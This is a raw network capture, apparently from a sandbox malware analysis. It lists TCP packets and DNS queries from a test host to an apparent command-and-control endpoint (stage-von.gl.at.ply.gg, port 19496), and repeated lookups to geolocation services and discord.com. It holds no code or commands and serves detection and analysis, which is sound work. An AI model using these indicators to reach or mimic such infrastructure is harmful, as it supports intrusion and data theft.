                                      Sep 7, 2024 01:48:42.991130114 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:42.993130922 CEST49800443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:44.428663969 CEST1949649797147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:44.428738117 CEST4979719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:44.438111067 CEST4979719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:44.440041065 CEST4980319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:44.442872047 CEST1949649797147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:44.444865942 CEST1949649803147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:44.444942951 CEST4980319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:44.462362051 CEST4980319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:44.672334909 CEST1949649803147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:45.535182953 CEST4979480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:46.028076887 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.028130054 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.028230906 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.030338049 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.030354023 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.513632059 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.513693094 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.515173912 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.515183926 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.515428066 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.531182051 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.576509953 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.673521042 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.673595905 CEST44349804188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:46.673650980 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.674360037 CEST49804443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:46.675486088 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:46.675529003 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:46.675602913 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:46.675868988 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:46.675879002 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.131151915 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.131223917 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.133164883 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.133171082 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.133414030 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.134748936 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.176507950 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274203062 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274240971 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274271011 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274296999 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.274307013 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274346113 CEST44349806104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:47.274349928 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.274410009 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.276160955 CEST49806443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:47.276546955 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:47.281342983 CEST8049807208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:47.281431913 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:47.281548023 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:47.288105011 CEST8049807208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:47.759125948 CEST8049807208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:47.813033104 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:48.615346909 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:48.615394115 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:48.615500927 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:48.619103909 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:48.619122982 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.087205887 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.087280989 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:49.088629961 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:49.088648081 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.088892937 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.111990929 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:49.156495094 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.226490021 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.226561069 CEST44349808188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:49.226617098 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:49.227195978 CEST49808443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:49.228332996 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.228368998 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:49.228462934 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.228671074 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.228682041 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:49.357609034 CEST1949649803147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:49.357696056 CEST4980319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:49.689790010 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:49.689902067 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.691591978 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.691596985 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:49.691808939 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:49.693146944 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:49.740488052 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:50.113584042 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:50.113636971 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:50.113668919 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:50.113750935 CEST44349809104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:50.114072084 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:50.117161989 CEST49809443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:50.137835026 CEST4980319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:50.140542984 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:50.143858910 CEST1949649803147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:50.145689011 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:50.145777941 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:50.847862959 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:50.852813005 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:53.955070019 CEST4981280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:53.959862947 CEST8049812208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:53.959925890 CEST4981280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:53.960026026 CEST4981280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:53.965137005 CEST8049812208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:53.993206978 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:53.993231058 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:53.993288994 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:53.993539095 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:53.993550062 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.478053093 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.478127956 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.479815006 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.479825020 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.480091095 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.481456995 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.515522003 CEST8049812208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:54.528497934 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.528532982 CEST4981280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:54.533684015 CEST8049812208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:54.533795118 CEST4981280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:54.638344049 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638387918 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638421059 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638498068 CEST44349813104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:54.638526917 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.638575077 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:54.640067101 CEST49813443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:55.054326057 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:55.054414988 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:58.145677090 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.145721912 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.145811081 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.146037102 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.146049023 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.638333082 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.638673067 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.639781952 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.639796019 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.640032053 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.641083002 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.684503078 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.717168093 CEST4980780192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:58.797559023 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797604084 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797636986 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797662020 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.797681093 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797743082 CEST44349817104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:58.797831059 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:58.801158905 CEST49817443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:59.001163960 CEST4981019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.006258965 CEST1949649810147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:59.017163038 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.022021055 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:59.022130013 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.181162119 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:59.186055899 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.366458893 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.566498995 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.566560030 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.571501970 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.594583035 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.602626085 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.766669989 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:00.771519899 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:00.777142048 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777173996 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:00.777354002 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777801991 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:00.777813911 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.346347094 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.346431971 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.348115921 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.348197937 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.348206043 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.348459959 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.349508047 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.354361057 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.354433060 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.354572058 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:01.362921000 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.392508030 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.514957905 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515016079 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515048981 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515116930 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.515120983 CEST44349821104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:01.515305996 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.517163038 CEST49821443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:01.843399048 CEST8049822208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:49:01.969305038 CEST4982280192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:49:03.000292063 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000329971 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.000401974 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000662088 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.000673056 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.466550112 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.466635942 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.467772007 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.467782021 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.468018055 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.468832016 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.516499043 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636077881 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636120081 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636157036 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636225939 CEST44349824104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:03.636280060 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.637208939 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.638071060 CEST49824443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:03.907057047 CEST1949649818147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:49:03.907174110 CEST4981819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:49:07.993417025 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993439913 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:07.993676901 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993937016 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:07.993949890 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.457082033 CEST44349826104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:49:08.457277060 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.458381891 CEST49826443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:49:08.458389044 CEST44349826104.21.85.189192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 7, 2024 01:47:01.652681112 CEST | 192.168.2.5 | 1.1.1.1 | 0xd99b | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:04.377768040 CEST | 192.168.2.5 | 1.1.1.1 | 0x8b0e | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:05.355971098 CEST | 192.168.2.5 | 1.1.1.1 | 0x1a26 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:41.035281897 CEST | 192.168.2.5 | 1.1.1.1 | 0x1834 | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.133057117 CEST | 192.168.2.5 | 1.1.1.1 | 0x7ac1 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.818895102 CEST | 192.168.2.5 | 1.1.1.1 | 0xad3e | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.847522974 CEST | 192.168.2.5 | 1.1.1.1 | 0xe260 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:48.584542036 CEST | 192.168.2.5 | 1.1.1.1 | 0xbe7d | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:48.878619909 CEST | 192.168.2.5 | 1.1.1.1 | 0x3c25 | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:59.974980116 CEST | 192.168.2.5 | 1.1.1.1 | 0xa70f | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:00.657717943 CEST | 192.168.2.5 | 1.1.1.1 | 0xa249 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:01.743432999 CEST | 192.168.2.5 | 1.1.1.1 | 0xbd4 | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.315138102 CEST | 192.168.2.5 | 1.1.1.1 | 0x7c1c | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:10.103230000 CEST | 192.168.2.5 | 1.1.1.1 | 0xece2 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:15.188628912 CEST | 192.168.2.5 | 1.1.1.1 | 0x3f99 | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:15.513102055 CEST | 192.168.2.5 | 1.1.1.1 | 0xf5c3 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:16.489011049 CEST | 192.168.2.5 | 1.1.1.1 | 0xeb72 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.748456955 CEST | 192.168.2.5 | 1.1.1.1 | 0x8e03 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:23.581475973 CEST | 192.168.2.5 | 1.1.1.1 | 0xe39 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:27.960617065 CEST | 192.168.2.5 | 1.1.1.1 | 0x7c4f | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:29.605412006 CEST | 192.168.2.5 | 1.1.1.1 | 0xba9c | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.256105900 CEST | 192.168.2.5 | 1.1.1.1 | 0x3eaa | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.864029884 CEST | 192.168.2.5 | 1.1.1.1 | 0xb15d | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:35.429744959 CEST | 192.168.2.5 | 1.1.1.1 | 0x2334 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:39.508030891 CEST | 192.168.2.5 | 1.1.1.1 | 0xe054 | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:41.413149118 CEST | 192.168.2.5 | 1.1.1.1 | 0x6ec8 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:42.352967024 CEST | 192.168.2.5 | 1.1.1.1 | 0x46 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.040323019 CEST | 192.168.2.5 | 1.1.1.1 | 0x125d | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:47.268054962 CEST | 192.168.2.5 | 1.1.1.1 | 0xd9d8 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.100297928 CEST | 192.168.2.5 | 1.1.1.1 | 0x50b4 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.985632896 CEST | 192.168.2.5 | 1.1.1.1 | 0xca80 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.352865934 CEST | 192.168.2.5 | 1.1.1.1 | 0x5570 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:59.004132032 CEST | 192.168.2.5 | 1.1.1.1 | 0xf3f | Standard query (0) | stage-von.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:01.253130913 CEST | 192.168.2.5 | 1.1.1.1 | 0x89ee | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.122364044 CEST | 192.168.2.5 | 1.1.1.1 | 0xbc28 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.984330893 CEST | 192.168.2.5 | 1.1.1.1 | 0xc900 | Standard query (0) | ipbase.com | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.787456036 CEST | 192.168.2.5 | 1.1.1.1 | 0xc1e | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 7, 2024 01:47:01.660280943 CEST | 1.1.1.1 | 192.168.2.5 | 0xd99b | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:04.407339096 CEST | 1.1.1.1 | 192.168.2.5 | 0x8b0e | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:04.407339096 CEST | 1.1.1.1 | 192.168.2.5 | 0x8b0e | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:05.364923000 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a26 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:05.364923000 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a26 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:41.046896935 CEST | 1.1.1.1 | 192.168.2.5 | 0x1834 | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.142256975 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ac1 | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.142256975 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ac1 | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.826366901 CEST | 1.1.1.1 | 192.168.2.5 | 0xad3e | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.826366901 CEST | 1.1.1.1 | 192.168.2.5 | 0xad3e | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:45.854371071 CEST | 1.1.1.1 | 192.168.2.5 | 0xe260 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.273549080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7d | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.273549080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7d | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.273549080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7d | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.273549080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7d | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.273549080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7d | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:49.282408953 CEST | 1.1.1.1 | 192.168.2.5 | 0x3c25 | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:59.982079983 CEST | 1.1.1.1 | 192.168.2.5 | 0xa70f | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:47:59.982079983 CEST | 1.1.1.1 | 192.168.2.5 | 0xa70f | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:00.666349888 CEST | 1.1.1.1 | 192.168.2.5 | 0xa249 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
